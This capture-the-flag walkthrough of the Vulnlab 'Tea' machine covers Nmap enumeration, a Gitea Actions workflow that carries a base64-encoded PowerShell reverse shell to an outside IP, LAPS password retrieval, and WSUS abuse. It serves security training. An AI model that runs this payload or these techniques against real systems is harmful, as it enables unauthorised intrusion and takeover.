VL - Tea
Enumeration
We start with a quick Nmap scan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
└─$ sudo nmap 10.10.205.21,22
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-16 16:28 CET
Nmap scan report for 10.10.205.21
Host is up (0.017s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
Nmap scan report for 10.10.205.22
Host is up (0.015s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
445/tcp open microsoft-ds
3000/tcp open ppp
3389/tcp open ms-wbt-server
We can make up that .21 is a DC, we start with exploring .22 first.
10.10.205.22
Local User
On port 80 is a default IIS running but on port 3000 is Gitea running with open registration. There are no repos but in the settings there is an runner which is labeled as windows:
As stated by the Gitea documentation we have to enable Actions in order to use it in our repo: We can create our own workflow now in a repository .gitea/workflows/demo.yaml:
1
2
3
4
5
6
7
8
9
name: Gitea Actions Demo
run-name: $ is testing out Gitea Actions 🚀
on: [push]
jobs:
Explore-Gitea-Actions:
runs-on: windows-latest
steps:
- run: powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADEALgAyADUAIgAsADQANAAzACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
And when we wait we get a shell!
Privilege Escalation
In order to see hidden files and folders we can run: cmd /c dir /A This reveals the _install folder which has some interesting files in it: 
Since we see a LAPS doc and msi file we can try to see if we have right to get the LAPS password, none of the default tools shows any output. Not to long ago Laps 2.0 got released named Windows LAPS] (thanks for the great name Microsoft..). There is also a really interesting blog posts about the internals of the new LAPS] which i highly recommend to read.
1
2
3
4
5
6
7
8
9
10
11
12
PS C:\_install> Get-LapsADPassword -Identity srv -AsPlainText
ComputerName : SRV
DistinguishedName : CN=SRV,OU=Servers,DC=tea,DC=vl
Account : Administrator
Password : N1c3TryL0L
PasswordUpdateTime : 12/24/2023 5:57:53 AM
ExpirationTimestamp : 1/23/2024 5:57:53 AM
Source : EncryptedPassword
DecryptionStatus : Success
AuthorizedDecryptor : TEA\Server Administration
We can now become Administrator and obtain the second flag.
10.10.205.21
On the .22 there is WSUS running which is a tool that helps with domain wide server updates we can use the tool to exectute commands on different machines, we use a Microsoft signed binary (PsExec) to add another user DC wide to the Administrators group.
We can use another version of SharpWSUS since the Nettitude version isn’t maintained anymore.